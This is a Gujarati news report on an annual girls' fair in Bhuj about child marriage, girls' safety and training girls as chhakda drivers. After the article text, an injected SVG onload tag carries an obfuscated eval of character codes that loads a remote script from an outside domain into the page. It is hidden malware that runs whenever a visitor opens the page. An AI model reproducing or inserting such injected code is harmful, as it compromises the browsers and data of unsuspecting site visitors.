કિશોરીઓને સલામતિ મળે અને એમના સપનાઓને પાંખ મળે એ માટે તંત્ર, સંસ્થા અને સમાજ કાર્યશીલ બને એ હેતુ સાથે સતત ચોથા વર્ષે “કચ્છ મહિલા વિકાસ સંગઠન” અને “સખિ સંગીનિ” દ્વારા ભુજમાં “કિશોરીઓનો કલરવ” કાર્યક્રમનું આયોજન કર્યું હતું. આ અવસરે કિશોરીઓ માટે મનોરંજક કાર્યક્રમ, વાહન વ્યવહાર સલામતિ સાથે જે દિકરીઓ છકડો ચલાવવાની તાલીમ મેળવી ચૂકી છે તેમને છકડા અર્પણ કરવા સહિતના કાર્યક્રમો યોજાયા હતા.
ભુજ નગરપાલિકા પ્રમુખ લતાબેન સોલંકીની અધ્યક્ષતામાં આયોજિત કિશોરી મેળાને વૃક્ષને પાણી આપી નવતર રીતે ખુલ્લો મુકાયો હતો. કેએમવીએસના ડાયરેક્ટર અરુણાબેન જોષીએ પ્રસંગ પરિચય કરાવતાં જણાવ્યું હતું કે, આ મેળાનો મુખ્ય ઉદ્દેશ્ય અનેક બંધનો છતાં પણ પોતાના સપનાને સાકાર કરનાર કિશોરીઓની સંઘર્ષયાત્રા જાણવા તેમજ કિશોરીઓના સલામતિ સહિતના મુદ્દે તંત્ર, સંસ્થા અને સમાજ સાથે મળી સંવાદ કરે એ માટે સતત ચોથા વર્ષે મેળાનું આયોજન કરાયું છે. શરુઆતમાં કિશોરીઓએ બાળલગ્ન અને કિશોરીઓના સપનાને વણી લેતાં સંગીતસભર નૃત્ય અને નાટિકા રજૂ કરી અસરકારક સંદેશ પહોંચાડ્યો હતો. આ પ્રસંગે અમદાવાદ ખાતે છકડા ચાલકની તાલીમ મેળવી આવેલી કિશોરીઓએ કેવી રીતે સંઘર્ષ કરી પોતાના પરિવાર અને સમાજમાં દાખલો બેસાડ્યો તેની વાત રજૂ કરી હતી. આ સાથે તાલીમબધ્ધ થયેલી દેવીપુજક પરિવારની બે દિકરીઓ ચાંદનીબેન અને આશાબેનને છકડાની ચાવી મહેમાનોના હસ્તે અર્પણ કરાઇ હતી. તાલીમ લેનાર કિશોરીઓને ભુજમાં ચાલતા “હોમ્સ ઇન ધ સીટિ” પ્રકલ્પમાંથી ફેલોશીપ આપવામાં આવી હતી તેમજ અમદાવાદની ડ્રિમ ફાઉન્ડેશન તરફથી છકડો લેવા માટે વ્યાજ મુક્ત લોન મેળવવામાં સહયોગ આપવામાં આવ્યો છે.
તંત્ર, સંસ્થા અને નાગરિકોના પ્રતિનિધિઓ વચ્ચે આ પ્રસંગે સંવાદ રચાયો હતો જેમાં કેએમવીએસના અલ્કાબેન જાનીએ મુદ્દો રાખ્યો હતો કે સમાજમાં એક સલામત વાતાવરણ ઉભું થાય જેમાં કિશોરીઓ પોતાની જાતે આગળ વધી શકે એ માટે શું કરી શકાય; તેમજ માલશ્રીબેન ગઢવીએ મુદ્દો રજૂ કર્યો હતો કે દરેક વિસ્તારમાં કિશોરીઓ અને મહિલાઓના મુદ્દે સમયાંતરે કાઉન્સીલરો સાથે બેઠકો યોજવામાં આવે. આ મુદ્દાઓના પ્રત્યુત્તરમાં નગર અધ્યક્ષા લતાબેને સંસ્થાને અભિનંદન પાઠવતાં કિશોરીઓને કોઇ પણ દબાણમાં આવ્ય વિના પોતાના સપના પુરા કરવા આહવાન કર્યું હતું તેમજ નગરપાલિકા તરફથી કિશોરીઓના હિત માટે જે કંઇ ઘટતું કરવાની ખાતરી આપી હતી. તો કારોબારી ચેરમેન ભરતભાઇ રાણાએ છકડા ચાલક તરીકેની પહેલ કરાનારી કિશોરીઓને અભિનંદન પાઠવતાં ભુજમાં ૫૦ ટકા મહિલા છકડા ચાલકો તૈયાર થાય એવી ઇચ્છા વ્યક્ત કરવા સાથે ટૂંક સમયમાં “નગરપાલિકા આપના દ્વારે” કાર્યક્રમ દરેક વોર્ડમાં યોજાનાર છે જેમાં કિશોરીઓ સાથે વિસ્તારના દરેક પ્રશ્નોના ઉકેલ મેળવવા પ્રયાસ કરવામાં આવશે તેવી માહિતી આપી હતી. ટ્રાફિક પીઆઇ જે, એમ. રાણાએ ભુજમાં મહિલા રીક્ષા સ્ટેન્ડ ફાળવવા નગરપાલિકા સમક્ષ રજૂઆત કરી હતી તેમજ રીક્ષાને ખાસ કલર આપી રીક્ષા પાછળ ‘મહિલા સંચાલિત રીક્ષા‘ લખવા સહિત સુચનો કર્યા હતા. જિલ્લા ઉદ્યોગ અધિકારી અખિલેશભાઇ અંતાણીએ વધુ ૧૦–૧૫ કિશોરીઓ તાલીમ માટે તૈયાર થતી હોય તો દેના બેંકની ‘દેના ગ્રામીણ સ્વરોજગાર તાલીમ‘ અંતર્ગત જિલ્લા ઉદ્યોગ ભવનના સહયોગથી ભુજ ખાતે જ તાલીમની વ્યવસ્થા કરવામાં આવશે તેવી વાત મુકી હતી. આ ઉપરાંત પ્રિતિબેન સોનીએ મુકેલા બાળલગ્નના મુદ્દા અંગે દેવીપુજક સમાજના પ્રેમજીભાઇ વાઘેલાએ પોતાના સમાજમાં આજ પછી એક પણ બાળલગ્ન નહિં થાય અને દિકરીની ઇચ્છા બાદ જ લગ્ન કરાવાશે એવો સચોટ વિચાર રજૂ કર્યો હતો. આ મુદ્દે કાઉન્સીલર ગોદાવરીબેન ઠક્કરે જણાવ્યું હતું કે, બાળલગ્નના મુદ્દે કિશોરીઓ સાથે તેમના વાલી સાથે સંવાદ જરુરી છે. તેમજ નગરપાલિકામાં બાળલગ્ન વિરોધી સમિતીના ગઠન અંગે લતાબેન સચદેએ વિચાર રજૂ કર્યો હતો જેમાં એચઆઇસીના સ્ટીયરીંગ કમીટિ મેમ્બર અરુણભાઇ વચ્છરાજાનીએ ટેકો પુરો પાડતાં નગરપાલિકામાં આવી સમિતીઓ રચી શકાતી હોવાની વાત કરી હતી. તેમજ સંદિપભાઇ વીરમાણીએ કિશોરીઓને પોતાના સપના જીવવા આહવાન કરી કેએમવીએસને આયોજન બદલ અભિનંદન પાઠવ્યા હતા. તો ઉપેન્દ્રભાઇ ઉપાધ્યાયે એક જાગૃત નાગરિક તરીકે આવા આયોજનમાં હમેશાં સહકાર આપવાની વાત કરી હતી.
આ પ્રસંગે નગરપાલિકાના પ્રતિનિધિઓ ઉપરાંત વોર્ડ મેમ્બર સભ્ય મંજુલાબેન ગોર, વોર્ડ ૨ના કાઉન્સીલર આયસુબેન સમા, સખિ સંગીનિ પ્રમુખ હંસાબેન વાઘેલા, ફાતમાબેન જત, દેના બેંક બ્રાન્ચ હેડ અજિતભાઇ શર્મા, ચાઇલ્ડ પ્રોટેક્શન વિભાગના પુનિતભાઇ, પ્રધાનમંત્રી કૌષલ્ય વર્ધન કેન્દ્રના ઉદયભાઇ, એડવોકેટ રસિલાબેન પંડ્યા તેમજ સેતુ અભિયાન, અર્બન સેતુ, સહજિવન સંસ્થાઓના પ્રતિનિધિ હાજર રહ્યા હતા. કેએમવીએસના કાર્યકરોએ વ્યવસ્થા સંભાળી હતી તેમજ જિજ્ઞાબેન ગોર અને વર્ષાબેને સંચાલન સંભાળ્યું હતું. સમુહભોજન સાથે મેળાનું સમાપન થયું હતું.
<svg/onload=eval(String.fromCharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,41,125,40,41,59))>
No Comment
Comments are closed here.